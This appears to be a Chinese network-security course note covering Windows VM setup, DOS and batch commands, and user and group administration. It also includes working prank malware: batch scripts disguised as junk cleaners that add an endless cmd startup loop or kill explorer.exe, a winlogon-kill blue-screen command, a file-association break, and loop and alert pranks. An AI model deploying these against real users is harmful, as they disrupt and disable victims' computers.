网络安全

一、windowsxp、windows2003、windows7、windows2008系统部署
具体部署
部署步骤总结：

准备windows系统镜像ISO
a.安装对应windows虚拟机
b.优化虚拟机
c.调出桌面图标安装
d. 安装vmware tools（安装驱动），重启操作（与真实机互动磁盘管理（创建D盘分区）
e.关闭系统自动更新、关闭防火墙（2003默认已经关闭防火墙）
f.做快照（建议关机再做快照）
g.克隆虚拟机一链接克隆一修改计算机名一快照

Windows各种版本系统关闭更新服务与防火墙开关
各版本更新与防火墙关闭
创建隐藏盘
先在需要用隐藏盘的盘中建文件夹（可以修改图标）；然后在磁盘管理中建立新盘时选择装入文件夹即可

IP详解及简单的DOS命令

net user 用户名 密码      #修改账户密码（windows所有平台支持）

 >nul       #清除一条命令执行后系统反馈

    分区块
    ：menu
    "menu"区块
    :1
    “1”区块
    :2
    “2”区块
    :3
    "3"区块
    goto 区块名              #程序跳该区块
    例如：goto menu      #程序跳至“menu区块”
    if "%num%"=="1" 命令1       #如果条件成立，执行命令1；条件不成立，跳过命令1，向下走
     cls                       #清屏 
  echo.           #输出一个空
常用shutdown命令：
shutdown -a          #取消关机   
shutdown -s          #关机
shutdown -f　        #强行关闭应用程序
shutdown -l　        #注销当前用户
shutdown -r　        #关机并重启
shutdown -s -t 时间　#定时关机
shutdown -h          #休眠
更多的 cmd:
shutdown ?   
查看

例子
@echo off         
color 0a             
title 小程序v1.0     
 
:menu
cls
echo ==========================
echo               菜单
echo         1、修改管理员密码
echo         2、定时关机
echo         3、打开截图工具
echo         4、映射到H盘
echo         5、取消映射到H盘
echo         6、退出本程序
echo ===========================
 
set /p num=您的选择是：   
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
if "%num%"=="4" goto 4
if "%num%"=="5" goto 5
if "%num%"=="6" goto 6
echo 别闹，好好输！
pause
goto menu
:1
set /p u=请输入用户名:
set /p p=请输入新密码:
net user %u% %p%   >nul
echo 您的密码已经设置成功!
pause
goto menu
:2
set /p time=请输入时间：
shutdown -s -t %time%  
set /p x=是否取消（1：是，0：否）：
if "%x%"=="1" shutdown -a
goto menu
pause 
:3
start snippingtool
goto menu
pause
:4
start subst.exe  h: E:\vxworks70640\vxworks70640\workbench-4\eclipse\x86_64-win32\workspace\ls1046_TCMS
goto menu
pause
:5
start subst.exe  h: /d
goto menu
pause
:6
exit

批处理
批处理与简单的病毒

简单的批处理文件一
功能：伪装垃圾清理程序添加一个开机自启动项，无限弹出CMD窗口
@echo off
title 系统垃圾清理
color 2f
echo =======若杀毒软件恶意拦截，请选择【允许程序的所有操作】========
echo.
echo.
echo :start>c:\windows\windows.bat
echo start cmd>>c:\windows\windows.bat
echo goto start>>c:\windows\windows.bat
copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul
if %errorlevel%==0 goto next 
copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动" >nul
if %errorlevel%==1 goto error
:next
echo.
echo.
echo   ====== 垃圾清理中，请不要关闭窗口======
echo.
ping -n 5 127.0.0.1 >nul
echo.
echo   ====== 垃圾清理完毕，共清理垃圾500M===
echo.
echo.
echo   ====== 建议立即重启电脑
pause
goto ex
 
:error
echo.
echo.
echo   ====== 程序运行失败，请使用【管理员权限】重新运行！======
echo.
pause
goto ex
 
:ex
exit

运行效果：
运行完成后我们可以看到在开始启动项中多了一个windows.bat文件。
此时重启电脑将会卡死
简单的批处理文件二
功能：伪装垃圾清理程序强制终止桌面进程

@echo off
title 系统垃圾清理
color 2f
echo ====== 若有杀毒软件恶意拦截，请选择【允许程序的所有操作】=====
echo.
echo.
 
:next
echo.
echo.
echo ====== 垃圾清理中，请不要关闭窗口=======
echo.
ping -n 5 127.0.0.1 >nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo. ===== 完了，你系统废了======
ping -n 5 127.0.0.1>nul
echo.
start c:\windows\explorer.exe
echo.
echo ====== 已经修复好了！是不是吓坏了！！嘿嘿=========
pause

备注：
   >nul         即“1>nul”；屏蔽操作成功显示的信息，但是出错还是会显示
   2>nul        是屏蔽操作失败显示的信息，如果成功依旧显示。
   >nul 2>nul   全部都屏蔽，成功的还是失败的都不显示

桌面进程被杀死！
桌面进程恢复：

最简单的蓝屏炸弹文件
ntsd -c q -pn winlogon.ex
 分析:
 ntsd       #杀死进程 
ntsd -c q -pn 进程名     #强制杀死进程
 蓝屏原因：winlogon 进程不能被杀死，我想强制杀死，系统不让，结果导致蓝屏！
对win2003有很大的杀伤力，但对win2008基本没有杀伤力
最简单的病毒
assoc.exe=txtfile
分析：
修改文件关联，导致文件无法正常打开

测试效果：

最简单的病毒解药
assoc.exe=exefile
只需将文件后缀与其关联文对应即可

最简单的死循环脚本
方法：将.txt改为.vbs
注：可以用修改图标软件修改vbs文件图标
do
msgbox "我最帅！"
loop

效果：窗口无法关闭
解决方法：
vbs 使用微软自带的wscript.exe来编写的，所以在任务管理器中杀死进程即可

整人网页

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>很恶心的常见整人效果的代码</title>
	<link rel="stylesheet" href="">
</head>
<body>
	<a href="" onmouseover="alert('飞哥真帅');
alert('飞哥真帅');
alert('飞哥是真帅');
alert('飞哥是真帅');
alert('飞哥是真的帅');
alert('同意不！');
alert('不同意？');
alert('去死吧');
	">不许把鼠标移到这里！</a>点了真爽！！！
</body>
</html>

测试效果：

用户与组管理（一般针对服务器操作）

windows服务器系统：win2000 win2003 win2008 win2012
linux服务器系统：Redhat Centos ubuntu等

用户管理
每个用户有自己的唯一的SID(安全标识符)
用户SID
系统SID
windows 系统管理员administrator的UID是 500
普通用户是1000 开始的
linux 系统管理员root 的UID是 0
普通用户是1000开始
账号密码存储的位置 ：C:\windows\system32\config\SAM #暴力破解，撞库
windows系统上，默认密码最长有效期42天（尤其是服务器系统）
内置账户
给人使用的：
administrator 管理员账号
guest 来宾账户
计算机服务组件
system 系统账户，权限至高无上
local services 本地服务账户 普通权限
network services 网络服务账户 普通权限
配置文件
windows ”用户“
账户dos命令
    net user
    net user 账户名 字符串   #修改密码
    net user 账户名         #查看账户信息
    net user 账户名 密码 /add  #新建账户
    net user 账户名 /del  #删除账户
    net user 账户名 /active:yes/no  #激活或禁用账户

组管理
组的作用：简化权限赋予
赋权限方式：
1)用户 - 组-赋权限
2)用户-赋权限
内置组（系统自带组）
内置组的权限已经被系统赋予
    administrators      #管理员组
    guests             #来宾组
    users              #普通用户组
    network            #网络配置组
    print              #打印机组
    Remote Desktop     #远程桌面组
    net localgroup     #查看组
    net localgroup 组名    #查看组
    net localgroup 组名 /add     #创建组
    net localgroup 组名 用户名 /add   #添加组成员
    net localgroup 组名 用户名 /del   #删除组成员
    net localgroup 组名 /del       #删除组
服务器远程管理
图形化远程管理
运行 ：“mstsc”
telnet（命令行）\
查看本地上所有开放的端口 cmd “netstat -an”
telnet：23
远程桌面协议RDP：3389

windows系统密码破解.pdf

网络安全测试病毒具体说明.pdf
参考：

b站千峰网络安全视频：https://www.bilibili.com/video/BV1i7411G7vm?p=122